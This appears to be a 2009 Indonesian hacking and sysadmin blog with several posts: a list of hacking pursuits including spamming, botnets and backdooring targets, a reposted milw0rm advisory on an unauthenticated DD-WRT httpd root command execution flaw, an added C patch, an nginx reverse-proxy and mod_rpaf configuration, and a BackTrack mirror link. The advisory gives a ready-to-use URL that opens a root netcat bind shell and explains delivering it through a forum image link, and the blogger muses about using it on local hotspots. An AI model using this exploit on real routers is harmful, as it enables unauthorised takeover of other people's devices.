Thursday, July 23, 2009

The Elder Says: Read Google .......

For the thousand-and-somethingth time I have told my friend: search on Google. What's so hard about searching on Google? It's really easy, just "open Google, the knowledge there piles up until you get feverish :D if you study there", as my elder says. Sacred, all-powerful knowledge whose
items are: from hunting small targets up to targets as big as Gaban, spamming, peeking here and there, getting thousands of emails that contain nothing but botnet stuff, getting into the neighbour's wifi, deauthing here and there, wardriving around hotspot areas, firing up BackTrack to find holes, looking for local exploits, rooting a target and planting a backdoor; and if
you go the white-hat way you can get: network installation, squid routing, using nginx, tinkering with Cisco routers, tracing where the link is broken, BGP, OSPF, RIP routers, Java, JOSSO, JBoss, creating vhosts, DNS servers, mail servers with Zimbra, plenty. Now it's up to you to choose what you want to be; for the experience it's fine to learn it all, use it for good, it's hard to create ... now it just comes down to each person's creativity and how much time you set aside for all of it :) at minimum 12 hours in front of a computer + internet should be enough ...

Wednesday, July 22, 2009

DD-WRT (httpd service) Remote Command Execution Vulnerability

This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
in the latest 24 sp1 version of the firmware.

The problem is due to many bugs and bad software design decisions. Here is
part of httpd.c:

    if (containsstring(file, "cgi-bin")) {

        auth_fail = 0;
        if (!do_auth
            (conn_fp, auth_userid, auth_passwd, auth_realm,
             authorization, auth_check))
            auth_fail = 1;


......... (snip)............

        }
        exec = fopen("/tmp/exec.tmp", "wb");
        fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
        if (query)
            fprintf(exec, "/bin/sh %s/%s\n",
                    server_dir != NULL ? server_dir : "/www", file);
        else
            fprintf(exec, "/%s/%s\n",
                    server_dir != NULL ? server_dir : "/www",
                    file);
        fclose(exec);

        if (query) {
            exec = fopen("/tmp/exec.query", "wb");
            fprintf(exec, "%s\n", query);

........................
Two issues there:
1) No metacharacter handling
2) The command gets executed even without successful authentication.
You are not going to see any output if not authenticated, though.
.......................

            free(query);
            fclose(exec);
        }

        system2("chmod 700 /tmp/exec.tmp");
        system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

        if (auth_fail == 1) {
            send_authenticate(auth_realm);
            auth_fail = 0;

------------

3) httpd runs as root :)



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can easily get root on the device via
a browser with a URL like:

http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespace breaks it. Anyway, it can be easily
replaced with a shell variable like $IFS. So, getting a root shell on 5555/tcp
becomes as easy as typing this in your browser's URL bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:

Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI, which is bad, bad). However, a basic authentication dialog will appear. In
IE even this can be suppressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)

# milw0rm.com [2009-07-20]
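The snippet above is DD-WRT's own code. What follows is an added example, not from the advisory or the DD-WRT project, showing how the two code-level issues would be closed on the dispatch path: a whitelist on the CGI path (issue 1) and an authentication decision taken before anything is written to /tmp/exec.tmp or executed (issue 2). The function names cgi_path_is_safe and plan_cgi_exec are assumptions; the static result buffer is a shortcut for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Allow only a conservative character set and require the path to stay
 * inside cgi-bin. Anything the shell could interpret (';', '$', '&', '|',
 * whitespace, ...) is rejected, which stops "/cgi-bin/;nc$IFS-l..." and
 * "../" escapes alike. Assumed helper name, not from DD-WRT. */
int cgi_path_is_safe(const char *file)
{
    if (file == NULL || strncmp(file, "cgi-bin/", 8) != 0)
        return 0;
    for (const char *p = file; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-' || c == '/'))
            return 0;
    }
    if (strstr(file, "..") != NULL)
        return 0;
    return 1;
}

/* Returns the command line the handler would write to /tmp/exec.tmp, or NULL
 * when the request must be refused (the caller then sends the 401 challenge).
 * Authentication is decided before any file is written or executed, and the
 * path is validated first. */
const char *plan_cgi_exec(int authenticated, const char *server_dir,
                          const char *file, const char *query)
{
    static char cmd[512];
    const char *dir = server_dir != NULL ? server_dir : "/www";

    if (!authenticated)            /* issue 2: no exec before auth */
        return NULL;
    if (!cgi_path_is_safe(file))   /* issue 1: metacharacters rejected */
        return NULL;
    if (query != NULL)
        snprintf(cmd, sizeof cmd, "/bin/sh %s/%s", dir, file);
    else
        snprintf(cmd, sizeof cmd, "%s/%s", dir, file);
    return cmd;
}
```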

How many hotspots are there in Indonesia, I wonder ... the method is easy enough ... :D especially since this DD-WRT hole is quite exciting ...

nginx proxy

Nginx has proven effective, as my friend said; this time I will try implementing nginx .... here is the configuration


#######################################################################
#
# This is the main Nginx configuration file.
#
# More information about the configuration options is available on
# * the English wiki - http://wiki.codemongers.com/Main
# * the Russian documentation - http://sysoev.ru/nginx/
#
#######################################################################

#----------------------------------------------------------------------
# Main Module - directives that cover basic functionality
#
# http://wiki.codemongers.com/NginxMainModule
#
#----------------------------------------------------------------------

user nobody nobody;
worker_processes 2;

error_log /var/log/nginx/error.log;
#error_log /var/log/nginx/error.log notice;
#error_log /var/log/nginx/error.log info;

pid /var/run/nginx.pid;



#----------------------------------------------------------------------
# Events Module
#
# http://wiki.codemongers.com/NginxEventsModule
#
#----------------------------------------------------------------------

events {
    worker_connections 1024;
}


#----------------------------------------------------------------------
# HTTP Core Module
#
# http://wiki.codemongers.com/NginxHttpCoreModule
#
#----------------------------------------------------------------------

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] $request '
                    '"$status" $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    access_log /var/log/nginx/access.log main;

    sendfile on;
    #tcp_nopush on;
    #tcp_noauth on ;
    #keepalive_timeout 0;
    keepalive_timeout 65;

    gzip on;

    # Load config files from the /etc/nginx/conf.d directory
    include /etc/nginx/conf.d/*.conf;

    #
    # The default server
    #
    server {
        listen 82;
        server_name boc.telkom.net.id ;

        access_log /var/log/nginx/host.access.log main;

        # Main location
        location / {
            proxy_pass http://127.0.0.1:8080/;
            proxy_redirect off;

            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            client_max_body_size 10m;
            client_body_buffer_size 128k;

            proxy_connect_timeout 90;
            proxy_send_timeout 90;
            proxy_read_timeout 90;

            proxy_buffer_size 4k;
            proxy_buffers 4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
        }

        # Static files location (the dot before the extension must be escaped)
        location ~* ^.+\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|doc|xls|exe|pdf|ppt|txt|tar|mid|midi|wav|bmp|rtf|js)$ {
            root /spool/www/members_ng;
        }

    }
}

download the rpaf module

wget http://stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz

root@boc [~/mod_rpaf-0.6]# more README
mod_rpaf - reverse proxy add forward

This module does the opposite of mod_proxy_add_forward written
by Ask Bjørn Hansen. http://develooper.com/code/mpaf/

Compile and Install for 1.3:

apxs -i -a -c mod_rpaf.c

Compile and Install for 2.0:

apxs -i -c -n mod_rpaf-2.0.so mod_rpaf-2.0.c

or simply try:
make

Configuration Directives:
RPAFenable On
# Enable reverse proxy add forward
RPAFproxy_ips 127.0.0.1 10.0.0.1
# which ips are forwarding requests to us
RPAFsethostname On
# let rpaf update vhost settings
# allows to have the same hostnames as in the "real"
# configuration for the forwarding Apache
RPAFheader X-Forwarded-For
# Allows you to change which header mod_rpaf looks
# for when trying to find the ip the that is forwarding
# our requests



vi /usr/local/apache/conf.d/rpaf.conf


# Path to mod_rpaf-2.0.so, relative to /etc/httpd/
LoadModule rpaf_module modules/mod_rpaf-2.0.so

RPAFenable On
RPAFsethostname On

#Define our reverse proxy IP. Only substitute client IP in
#when we receive a request from this IP.
RPAFproxy_ips 127.0.0.1

# The header where the real client IP address is stored.
RPAFheader X-Forwarded-For

restart httpd, start nginx, and it runs ................ Keep RPAFproxy_ips limited to the proxy's own address (127.0.0.1 here): mod_rpaf only substitutes the X-Forwarded-For value for the client address on requests arriving from a listed IP, so a client that reaches Apache directly cannot forge its address.

Download Backtrack in Indonesia

This is a new link to download BackTrack from the Indonesian network; I made this as my contribution as an open source lover ... greets to http://opensource.telkomspeedy.com

download :

http://repo.opensource.telkomspeedy.com/backtrack/

we hope you enjoy ......